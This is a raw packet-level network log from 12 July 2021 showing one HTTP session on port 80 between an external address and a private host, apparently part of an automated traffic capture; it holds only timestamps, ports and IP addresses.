Jul 12, 2021 10:29:48.897165060 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.897187948 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.897205114 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.897716999 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.897792101 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.897891998 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.897922039 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.897977114 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.897999048 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.898026943 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.898053885 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.898076057 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.898096085 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.898108959 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.898135900 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.898161888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.898207903 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.898674011 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.898709059 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.898737907 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.898766994 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.898782015 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.898809910 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.898819923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.898848057 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.898859978 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.898886919 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.898912907 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.898933887 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.898952961 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.898982048 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.899008036 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.899029970 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.899049997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.899072886 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.899090052 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.899133921 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.899488926 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.899518013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.899566889 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.899594069 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.899619102 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.899652958 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.899662971 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.899710894 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.899735928 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.899753094 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.899777889 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.899827003 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.899854898 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.899905920 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.899936914 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.899967909 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.899995089 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.900032997 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.900536060 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.900572062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.900599003 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.900624037 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.900636911 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.900666952 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.900690079 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.900702953 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.900724888 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.900739908 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.900764942 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.900789022 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.900803089 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.900830030 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.900856018 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.900886059 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.900893927 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.900918007 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.900933981 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.900981903 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.901386023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.901422977 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.901448965 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.901475906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.901489973 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.901516914 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.901537895 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.901618004 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.901698112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.901711941 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.901740074 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.901794910 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.901855946 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.901953936 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.902004957 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.902060032 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.902199984 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.902328014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.902358055 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.902390003 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.902417898 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.902436018 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.902462006 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.902488947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.902514935 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.902529001 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.902556896 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.902570009 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.902597904 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.902643919 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.902672052 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.902699947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.902748108 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.902985096 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.903018951 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.903044939 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.903084040 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.903100967 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.903151035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.903163910 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.903192997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.903222084 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.903249979 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.903276920 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.903287888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.903316975 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.903367996 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.903393984 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.903423071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.903446913 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.903461933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.903491020 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.904124022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.904160976 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.904186964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.904212952 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.904234886 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.904254913 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.904280901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.904304981 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.904324055 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.904339075 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.904357910 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.904383898 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.904400110 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.904427052 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.904479027 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.904519081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.904551029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.904580116 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.904592991 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.904679060 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.904993057 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.905092001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.905204058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.905236959 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.905249119 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.905297995 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.905333996 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.905360937 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.905386925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.905415058 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.905426979 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.905455112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.905522108 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.905543089 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.905725956 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.905791044 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.905847073 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.905881882 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.905936003 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.905991077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.906021118 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.906044006 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.906064987 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.906092882 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.906122923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.906151056 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.906162024 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.906188011 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.906208992 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.906241894 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.906256914 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.906339884 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.906407118 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.906785965 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.906915903 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.906944990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.906972885 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.906991959 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.907015085 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.907048941 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.907078981 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.907108068 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.907159090 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.907167912 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.907196999 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.907242060 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.907259941 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.907284021 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.907296896 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.907324076 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.907351971 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.907397032 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.907867908 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.907901049 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.907928944 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.907953978 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.907979012 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.908003092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.908050060 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.908070087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.908092976 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.908108950 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.908132076 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.908149004 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.908175945 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.908233881 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.908243895 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.908267975 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.908308029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.908319950 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.908705950 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.908736944 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.908804893 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.908835888 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.908858061 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.908885002 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.908910990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.908942938 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.909024000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.909125090 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.909152031 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.909187078 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.909240961 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.909316063 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.909368038 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.909393072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.909441948 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.909621000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.909651041 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.909677029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.909708023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.909722090 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.909744024 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.909759998 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.909787893 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.909809113 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.909825087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.909848928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.909873962 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.909900904 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.909909964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.909935951 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.909948111 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.909996033 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.910397053 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.910428047 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.910454035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.910482883 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.910499096 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.910527945 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.910540104 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.910568953 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.910597086 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.910624027 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.910635948 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.910661936 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.910675049 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.910698891 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.910723925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.910754919 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.910762072 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.910788059 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.910804033 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.911228895 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.911266088 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.911292076 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.911319971 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.911348104 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.911376953 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.911402941 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.911411047 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.911437035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.911451101 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.911473989 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.911484957 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.911513090 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.911540985 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.911560059 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.911580086 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.911607027 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.911628008 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.911700964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.911746979 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.912149906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.912331104 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.912364006 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.912393093 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.912410021 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.912441969 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.912458897 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.912482023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.912508965 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.912539005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.912547112 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.912573099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.912586927 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.912916899 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.912954092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.912983894 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.913009882 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.913031101 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.913052082 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.913075924 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.913105011 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.913122892 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.913152933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.913180113 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.913202047 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.913219929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.913244009 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.913290977 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.913326979 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.913386106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.913408995 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.913424969 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.913484097 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.913963079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.914017916 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.914048910 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.914078951 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.914093971 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.914123058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.914155960 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.914163113 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.914187908 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.914216042 CEST	80	49755	47.254.186.176	192.168.2.3
